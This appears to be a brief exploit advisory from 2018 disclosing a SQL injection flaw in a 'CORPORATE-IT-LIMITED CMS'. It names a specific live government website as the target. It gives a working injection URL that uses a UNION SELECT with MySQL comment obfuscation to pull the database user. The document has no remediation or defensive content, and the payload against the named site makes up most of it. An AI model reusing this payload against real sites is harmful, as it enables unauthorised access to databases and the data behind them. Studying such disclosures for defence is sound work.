# Exploit Title : CORPORATE-IT-LIMITED CMS - SQL Injection Vulnerability
# Attack Vectors : An attacker as a normal user would use a simple SQL injection.
# Google Dork : N/A
# Discovered By : Mehdi Razmjoo
# Contact Me : razmjumehdi@gmail.com
# Attack Type : Remote
# Vulnerability Type : SQL Injection
# Date: 28-2-2018
---------------------------------------------------------
Reference :
http://www.bpc.gov.bd/contactus.php?id=[SQLi]
Injected Demo:
http://www.bpc.gov.bd/contactus.php?id=-13%27+/*!50000union*/+/*!50000SeLect+1*/,2,user(),4,5,6,7--+